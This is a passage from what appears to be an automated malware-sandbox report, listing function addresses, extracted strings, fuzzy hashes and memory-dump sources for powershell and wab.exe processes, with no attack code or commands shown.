Instruction ID: 9865902d9c37919913d0d6aebb04bace484133adbcc6055cb5ae03316ed706cf
Opcode Fuzzy Hash: 536a265a5c4b4369eb1bbe987d1a1ce9d156147406e48aec4905ff6b23e4c3de
Instruction Fuzzy Hash: 6D2149B130431BABEB285AFE894177777DAAFC4719F14883AA556CB294CE76CC418360

Function 04E5BCA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20f26fcfcb108ebffb8e3d89ea844343e93cde60243463b7031e2c6a4e307dce
Instruction ID: e79dd4a729a245324e8d29a915923807ad7fb568d8907be5228fac7421239e85
Opcode Fuzzy Hash: 20f26fcfcb108ebffb8e3d89ea844343e93cde60243463b7031e2c6a4e307dce
Instruction Fuzzy Hash: 59312C34B012189FCF25DB64D8557EEBBB2AF49305F1044E9D909AB361CB35AE86CF81

Function 07990DCC Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6132e437f35e5856fc5c5018a3fd274a2530e918288f6ff3203e5b335bbafa6
Instruction ID: 1e70e43ed8bc8bfa9e50ed233c553b123a409acd88ab76eb98a149663f5f61db
Opcode Fuzzy Hash: f6132e437f35e5856fc5c5018a3fd274a2530e918288f6ff3203e5b335bbafa6
Instruction Fuzzy Hash: 65214FF230434F6BEB2406BE89407727BA59F45715F18887AE594CB2D6CE758D80C371

Function 079908F0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144a4e015d877dad18560fa64bbb5189c3ef60c9b7bf25541a53cd626f0e7d95
Instruction ID: eb394bd70fa15810a931a2b881912405e18881d263d24af70bde1f77065bd10f
Opcode Fuzzy Hash: 144a4e015d877dad18560fa64bbb5189c3ef60c9b7bf25541a53cd626f0e7d95
Instruction Fuzzy Hash: 8F11F3B1A0021A9BEF149FAD85401ADB7E9AF88614B248975CC6AA7300D6309D40CBE0

Function 04E595C3 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a9c648626089afa3b5850c8f4c5cffafc4de417916733283d90600ae1de703e
Instruction ID: 203f7cce81667c5c88274497419991277e00ed140a618e50a4cc09afe621e76d
Opcode Fuzzy Hash: 4a9c648626089afa3b5850c8f4c5cffafc4de417916733283d90600ae1de703e
Instruction Fuzzy Hash: C9012CB8A402149FCB04DB98D4906E9F771FF8E314B259559D85A9B362CA36EC07CB50

Non-executed Functions

Function 0799BCE2 Relevance: 16.7, Strings: 13, Instructions: 471COMMON

Download Yara Rule

Strings

(ful, xrefs: 0799BF11
4']q, xrefs: 0799C130
(ful, xrefs: 0799BFE1
tLgk, xrefs: 0799BDFB
tLgk, xrefs: 0799BEF1
(ful, xrefs: 0799C30D
4']q, xrefs: 0799C11A
(ful, xrefs: 0799BE1B
x.fk, xrefs: 0799C3F1
-fk, xrefs: 0799C43F
(ful, xrefs: 0799C2A7
4']q, xrefs: 0799C1D4
4']q, xrefs: 0799C1BE

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$4']q$4']q$4']q$4']q$tLgk$tLgk$x.fk$-fk
API String ID: 0-3601915493
Opcode ID: f1bf863337b4278a7223a0259b2f477e28a81f7a85201b139bead2fcc80c03c1
Instruction ID: e68bf80419170e0c1fa8e772081029c5c8b85c9418b72749acb40d6639ba6762
Opcode Fuzzy Hash: f1bf863337b4278a7223a0259b2f477e28a81f7a85201b139bead2fcc80c03c1
Instruction Fuzzy Hash: 232253B4A402149FDB24DF28C950BEAB7B2FF49304F1085A9D5096B791CB76EE81CF91

Function 0799EFFD Relevance: 14.0, Strings: 11, Instructions: 209COMMON

Download Yara Rule

Strings

4']q, xrefs: 0799F24F
tP]q, xrefs: 0799F1BD
d%cq, xrefs: 0799F1DB
d%cq, xrefs: 0799F177
d%cq, xrefs: 0799F1E5
4']q, xrefs: 0799F25B
84sl, xrefs: 0799F15F
d%cq, xrefs: 0799F21A
$]q, xrefs: 0799F098
tP]q, xrefs: 0799F1B1
84sl, xrefs: 0799F169

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$84sl$84sl$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
API String ID: 0-2247629088
Opcode ID: a2a735e2b37315bc90e76bfe12135352e65e9c04188581bc0c79128839a5f12a
Instruction ID: 322df90fe4e12ca8a5cd1f7f0f9957c769135e5af639768e0b5ba1b964fd429b
Opcode Fuzzy Hash: a2a735e2b37315bc90e76bfe12135352e65e9c04188581bc0c79128839a5f12a
Instruction Fuzzy Hash: 617101B5B102068FEF248F6CC9507AAFBABEF85719F188875D801CB294CB75D841C7A1

Function 07997D70 Relevance: 10.2, Strings: 8, Instructions: 195COMMON

Download Yara Rule

Strings

$]q, xrefs: 07997F0E
$]q, xrefs: 07997D84
tP]q, xrefs: 07997E20
kl, xrefs: 07997F53
$]q, xrefs: 07997ED7
$]q, xrefs: 07997F02
kl, xrefs: 07997F45
tP]q, xrefs: 07997E14

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q$$]q$$]q$$]q$$]q$kl$kl
API String ID: 0-913898323
Opcode ID: aaf390ba9eadc092f8381b2dfc13c8e9980cf8803a30e9547025b661b8b5d9af
Instruction ID: 656f7c5c8bd728a5eaf752036364137927e069715dd22cd4a594b2c3144b5305
Opcode Fuzzy Hash: aaf390ba9eadc092f8381b2dfc13c8e9980cf8803a30e9547025b661b8b5d9af
Instruction Fuzzy Hash: EB516C717243059FEF254AED8801B67BBAAAFC2715F14887BE4498B2A1DE71CC00C3A1

Function 07998B38 Relevance: 7.7, Strings: 6, Instructions: 235COMMON

Download Yara Rule

Strings

XYul, xrefs: 07998CEB
4']q, xrefs: 07998D1D
XYul, xrefs: 07998CF7
0U]q, xrefs: 07998B53
Tek, xrefs: 07998CDD
4']q, xrefs: 07998D11

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: Tek$0U]q$4']q$4']q$XYul$XYul
API String ID: 0-2521075095
Opcode ID: e2c5f275cae0123a7b14a87fcb31ddeae56a8aa660821ca372f6f9c9f417ffe3
Instruction ID: 1d0f856225aab73b3167d1d0a95b5407efb7027f0a8695826060cbbd2a8c1d6d
Opcode Fuzzy Hash: e2c5f275cae0123a7b14a87fcb31ddeae56a8aa660821ca372f6f9c9f417ffe3
Instruction Fuzzy Hash: FF7125B1B052058FEB148B6DD440A6AFBEAEFD7225B28C47ED509CB255DA32C801C7A1

Function 0799AE20 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$]q, xrefs: 0799AEC3
$]q, xrefs: 0799AE73
$]q, xrefs: 0799AE9B
$]q, xrefs: 0799AEB7
$]q, xrefs: 0799AEA7
$]q, xrefs: 0799AE57

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 85bae768347ab60815253b8a7d067cc3a88c6f62b783feb8cbaa662c786993ce
Instruction ID: 39df360acb119120f8cba31ea177424a540d9c3e673a150cbc9fffaba360b72f
Opcode Fuzzy Hash: 85bae768347ab60815253b8a7d067cc3a88c6f62b783feb8cbaa662c786993ce
Instruction Fuzzy Hash: F03107B27143478FFF294AAE9891176F7A9EFC1619B18C87FC8468B241DE35C415C352

Function 0799F0FE Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

4']q, xrefs: 0799F24F
d%cq, xrefs: 0799F177
d%cq, xrefs: 0799F1DB
d%cq, xrefs: 0799F1E5
84sl, xrefs: 0799F15F
tP]q, xrefs: 0799F1B1

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$84sl$d%cq$d%cq$d%cq$tP]q
API String ID: 0-3943785754
Opcode ID: 976952f187e7d268a8ef5f0610714df002c503cf55eda6913579a332aed5c4ba
Instruction ID: a8cb382aabfda638740a168adc565a476cdb20ea2802dff83414f8679ed17380
Opcode Fuzzy Hash: 976952f187e7d268a8ef5f0610714df002c503cf55eda6913579a332aed5c4ba
Instruction Fuzzy Hash: A431A1B4B00215DFDB24CF5CC580AAAFBA7FB88728F248565E8059B355C771ED01CBA1

Function 07990284 Relevance: 7.6, Strings: 6, Instructions: 81COMMON

Download Yara Rule

Strings

$]q, xrefs: 0799035E
4']q, xrefs: 07990373
4']q, xrefs: 079902EB
4']q, xrefs: 079902F7
4']q, xrefs: 0799037F
$]q, xrefs: 07990352

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q
API String ID: 0-2669322367
Opcode ID: ca29e63b99e0ccdcfa2f7854d4984c7446435fb2732858ece52bd6c9c17286a7
Instruction ID: a1d1de8226cf3057ca7d6be688603e9752f02b6a27b475473135af4d27befe51
Opcode Fuzzy Hash: ca29e63b99e0ccdcfa2f7854d4984c7446435fb2732858ece52bd6c9c17286a7
Instruction Fuzzy Hash: 8B216D717093574FEB3A153C3421279AFEA9FC296872D48BBC4A1CB346CE154C068397

Function 0799FC85 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

84sl, xrefs: 0799FD19
tP]q, xrefs: 0799FD6E
84sl, xrefs: 0799FD0F
$]q, xrefs: 0799FCDD
tP]q, xrefs: 0799FD62

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 84sl$84sl$tP]q$tP]q$$]q
API String ID: 0-454792928
Opcode ID: d29fa60c6600ed8d4358ac4cbef4ad48cf3a7885fb90f7e8a46ee52633a8c148
Instruction ID: 66da7a29b4cc63d27165ba59c578f4638d1132076168451821bcaaad5f3fd402
Opcode Fuzzy Hash: d29fa60c6600ed8d4358ac4cbef4ad48cf3a7885fb90f7e8a46ee52633a8c148
Instruction Fuzzy Hash: C46103B1B001069FEF249BAC8540AAAFBE7AF88719F14C869D805CB256CB35DC41C7A1

Function 07990470 Relevance: 6.4, Strings: 5, Instructions: 148COMMON

Download Yara Rule

Strings

$]q, xrefs: 079904FC
4']q, xrefs: 0799055E
4']q, xrefs: 0799056A
$]q, xrefs: 07990541
$]q, xrefs: 07990535

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: c6f9045c5f23118282fa89f91c0c9caddbd32e093d85dcc888ecc36da431d1a8
Instruction ID: d74092479f60574007f8036988f21de17b81a9f73e401aacfddd877f739ad0e7
Opcode Fuzzy Hash: c6f9045c5f23118282fa89f91c0c9caddbd32e093d85dcc888ecc36da431d1a8
Instruction Fuzzy Hash: D94136B1704307AFEF255B3D88106BE7BAAAF82215F04447AD825CB251DF35C955C7A3

Function 07997750 Relevance: 6.4, Strings: 5, Instructions: 137COMMON

Download Yara Rule

Strings

,Sul, xrefs: 079977D5
p5ek, xrefs: 079977C7
], xrefs: 079978B0
xSul, xrefs: 079977A3
,Sul, xrefs: 079977E1

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: ,Sul$,Sul$]$p5ek$xSul
API String ID: 0-605379440
Opcode ID: 38c7f290cc2898d994eb325f4ff36307c3b0d0bdce75498ac51aa697eddf8616
Instruction ID: 86538c0af87e8bd82f7f41346c68ec6efd14e9f9c0c10b6117b08d5e4c8bba3b
Opcode Fuzzy Hash: 38c7f290cc2898d994eb325f4ff36307c3b0d0bdce75498ac51aa697eddf8616
Instruction Fuzzy Hash: 934136B1B14305AFDB208ABE85017AABFEAAF86314F14847AD409CF351DE75D850C7A2

Function 0799F355 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

4']q, xrefs: 0799F411
4']q, xrefs: 0799F41D
$]q, xrefs: 0799F3E5
$]q, xrefs: 0799F3F1
$]q, xrefs: 0799F3AB

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: 88623342704e69ea6f065ad3230116dc1035ada97e26ff4f347168a7a9559cbd
Instruction ID: 4e6fc82d7136bee63095760a5a400bc3b9cde7b25acd4bbd6e4a45a595fa53a5
Opcode Fuzzy Hash: 88623342704e69ea6f065ad3230116dc1035ada97e26ff4f347168a7a9559cbd
Instruction Fuzzy Hash: 313166B2B04216CFFF284A7E9894676F7DBAFC5399B28487BC841CA244CA39C455C752

Function 07992A68 Relevance: 5.3, Strings: 4, Instructions: 286COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07992B9A
84sl, xrefs: 07992B4D
tP]q, xrefs: 07992BA6
84sl, xrefs: 07992B43

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 84sl$84sl$tP]q$tP]q
API String ID: 0-3415725813
Opcode ID: 182e4cd6dcde8ae888c26069975ef1fb24f2f27988a4c916844b45b7972c7f29
Instruction ID: f7e159f3d2908c56c950338439747e2d7a787d32af6a6e739a058f97e9e62b3b
Opcode Fuzzy Hash: 182e4cd6dcde8ae888c26069975ef1fb24f2f27988a4c916844b45b7972c7f29
Instruction Fuzzy Hash: 01914DB1700206AFDF189F6DC89177ABBEABF85714F1888B9D8458F291DA71D841C3A1

Function 07999C18 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07999C46
$]q, xrefs: 07999C74
$]q, xrefs: 07999C2A
$]q, xrefs: 07999C80

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 81c414f25b06a87305ec09400857c4e36426faeec83c9c18c9005157faf71692
Instruction ID: 213976e7b053b505347d41d427df03977d4f5d282928d9f47f58270af8da8e77
Opcode Fuzzy Hash: 81c414f25b06a87305ec09400857c4e36426faeec83c9c18c9005157faf71692
Instruction Fuzzy Hash: 39212CB13142065BFF38596E8D4172776DA9BC1729F24883EA94DCB281ED76E840C761

Analysis Process: wab.exePID: 6752, Parent PID: 5884COMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	84
Total number of Limit Nodes:	9

Executed Functions

Function 028B6FC8 Relevance: 6.7, Strings: 5, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 028B728A
,aq, xrefs: 028B7298
(o]q, xrefs: 028B7220
(o]q, xrefs: 028B753D
(o]q, xrefs: 028B7212

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: eb423545c2eb1cf6c265e0dc5efc79e85355831e292a30f4b84926b1e3009872
Instruction ID: 349daf819a3ca0056202c1709f7d9f2548c9b3a2eb573d2c812e34c50bc26229
Opcode Fuzzy Hash: eb423545c2eb1cf6c265e0dc5efc79e85355831e292a30f4b84926b1e3009872
Instruction Fuzzy Hash: D5124C7AA00209DFCB16CF68C984AEDFBB2BF88304F558069E819EB365D734D941CB51

Function 028BC146 Relevance: 6.5, Strings: 5, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 028BC3EF
PH]q, xrefs: 028BC400
Lj@p, xrefs: 028BC38D
0o@p, xrefs: 028BC20A
Lj@p, xrefs: 028BC377

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: df3414a8a7c850a6043c7e9d340617ae0982902c72bad38db6178ee22ca73e9b
Instruction ID: ed55cf8a44b5c2a9114521dabe9d389fbf6e9028df7508d17162b6d9e18e33bd
Opcode Fuzzy Hash: df3414a8a7c850a6043c7e9d340617ae0982902c72bad38db6178ee22ca73e9b
Instruction Fuzzy Hash: F4A1F979E00218DFDB15CFAAC884A9DBBF2BF89310F14806AD819EB365DB349841CF51

Function 028B5362 Relevance: 6.4, Strings: 5, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 028B5566
PH]q, xrefs: 028B55D9
Lj@p, xrefs: 028B5550
PH]q, xrefs: 028B55C8
0o@p, xrefs: 028B53E2

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 4bb03d97c3ed97b7d7f67f13d9c698544ff7f3958a2d591a8c5c33bbe072b4cc
Instruction ID: 5aff715805ea83ac3bafa8350ed3e00961491aec8f2f9f7928d1e72af91eb472
Opcode Fuzzy Hash: 4bb03d97c3ed97b7d7f67f13d9c698544ff7f3958a2d591a8c5c33bbe072b4cc
Instruction Fuzzy Hash: 5C91E278E00248CFDB15CFA9C894A9DBBF2BF89301F5480A9D809EB365DB349985CF51

Function 028BC468 Relevance: 6.4, Strings: 5, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 028BC65D
PH]q, xrefs: 028BC6BF
0o@p, xrefs: 028BC4DA
Lj@p, xrefs: 028BC647
PH]q, xrefs: 028BC6D0

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 786fa5444426f46584209eab21617fc1d24c083caf799f2efdf0ca61544cfffa
Instruction ID: df84d4187902a384f5c058a67f14d1716b03a76fc338c302c0c15af352d3a8d5
Opcode Fuzzy Hash: 786fa5444426f46584209eab21617fc1d24c083caf799f2efdf0ca61544cfffa
Instruction Fuzzy Hash: 3991D378E002588FDB15DFAAC884ADDBBF2BF88300F14806AD819EB365DB349945CF51

Function 028BCA08 Relevance: 6.4, Strings: 5, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 028BCBE7
PH]q, xrefs: 028BCC5F
PH]q, xrefs: 028BCC70
0o@p, xrefs: 028BCA7A
Lj@p, xrefs: 028BCBFD

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: ee2b00dc1f74cb683c65734ce11e37a46950b5ea8a824a135455be46d00d940a
Instruction ID: fbd508d2568a4e3916aaf7453cd8ca644154ae9dbb0882188e1c6029647989e3
Opcode Fuzzy Hash: ee2b00dc1f74cb683c65734ce11e37a46950b5ea8a824a135455be46d00d940a
Instruction Fuzzy Hash: 3D91E478E00248CFDB15DFAAD854A9DBBF2BF89300F14806AD819EB365DB349885CF51

Function 028BCCD8 Relevance: 6.4, Strings: 5, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 028BCEB7
PH]q, xrefs: 028BCF2F
Lj@p, xrefs: 028BCECD
PH]q, xrefs: 028BCF40
0o@p, xrefs: 028BCD4A

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: a6edf754f72cc860ae79beb9144ddcfaa5b25c1899c143250322d83f51710ea3
Instruction ID: daae8b3e350019805a8ff1f2579c2f20b9bbc950cf9d15cd11587def7831b2ce
Opcode Fuzzy Hash: a6edf754f72cc860ae79beb9144ddcfaa5b25c1899c143250322d83f51710ea3
Instruction Fuzzy Hash: 3791B478E00248DFDB15CFA9D844A9DBBF2BF89300F14806AD819EB365DB349985CF51

Function 028BC738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 028BC92D
PH]q, xrefs: 028BC98F
PH]q, xrefs: 028BC9A0
Lj@p, xrefs: 028BC917
0o@p, xrefs: 028BC7AA

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: cb001ce32e22ace2c38efed4d71d430904a61a1762225e8d0ccca7aa445915ed
Instruction ID: 7cfb48c86b82ca4a6608308f38546f69492db407f4be242bbe9c9c7b2832dc33
Opcode Fuzzy Hash: cb001ce32e22ace2c38efed4d71d430904a61a1762225e8d0ccca7aa445915ed
Instruction Fuzzy Hash: 3A81A378E002189FDB15DFAAD984A9DBBF2BF88300F14C06AD819EB365DB349945CF51

Function 028BD599 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 028BD800
Lj@p, xrefs: 028BD78D
0o@p, xrefs: 028BD60A
PH]q, xrefs: 028BD7EF
Lj@p, xrefs: 028BD777

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: d460d3e344bb30502e82e1576c88ea6626489687aa8f50b0b7e5a8430b23838d
Instruction ID: 7f4620c1d6781175a375476bf9cb1f436e6a45d6c90e5cf8b1de2e3653fae0ec
Opcode Fuzzy Hash: d460d3e344bb30502e82e1576c88ea6626489687aa8f50b0b7e5a8430b23838d
Instruction Fuzzy Hash: 2581C178E00218DFDB15DFAAD984A9DBBF2BF88300F148069D819EB365DB34A945CF51

Function 028BCFAB Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o@p, xrefs: 028BD01A
Lj@p, xrefs: 028BD187
PH]q, xrefs: 028BD210
Lj@p, xrefs: 028BD19D
PH]q, xrefs: 028BD1FF

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: d8ac58f17e10f2517f7f46b73e613a31ec44a77754e00dc53d89b899e7b23efd
Instruction ID: f03ddac6b02d7aa50681ef6a91a666eadc64c282e7012426a311d03c11fc6fd5
Opcode Fuzzy Hash: d8ac58f17e10f2517f7f46b73e613a31ec44a77754e00dc53d89b899e7b23efd
Instruction Fuzzy Hash: C281A478E00218DFDB15DFAAD984A9DFBF2BF88300F148069D819AB365DB349945CF51

Function 028B29EC Relevance: 5.4, Strings: 4, Instructions: 449COMMON

Download Yara Rule

Strings

Xaq, xrefs: 028B2B57
Xaq, xrefs: 028B2BA4
Xaq, xrefs: 028B2A9E
Xaq, xrefs: 028B2AD8

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: 719cb2555b7c669d8cd33ac3567a7e79e9ba677bd4c208ac25b873bd979ca952
Instruction ID: 0c8df83749d06f5ad84a05b8e4c685ce09c813564085fc34bca8431c048b2478
Opcode Fuzzy Hash: 719cb2555b7c669d8cd33ac3567a7e79e9ba677bd4c208ac25b873bd979ca952
Instruction Fuzzy Hash: 0AF1B239A096969FCB12DF7CC4A0A9ABFF1FF4B200B0405EDD9959B31AC734A955CB01

Function 24495290 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 24498670

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 95193c51b7e57b21254ecd8dfe4ed278549aabb36603923c24ab180e70d0d919
Instruction ID: 0101e659cb27b5f507715de8dce6a424667fb0b9dbad97b20128b6f386354fda
Opcode Fuzzy Hash: 95193c51b7e57b21254ecd8dfe4ed278549aabb36603923c24ab180e70d0d919
Instruction Fuzzy Hash: DE73F731D1075A8ECB11EF68C854AADFBB1FF99300F51D69AE44867221EB70AAD4CF41

Function 028BA088 Relevance: 3.4, Strings: 2, Instructions: 905COMMON

Download Yara Rule

Strings

(o]q, xrefs: 028BA518
4']q, xrefs: 028BAB13

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

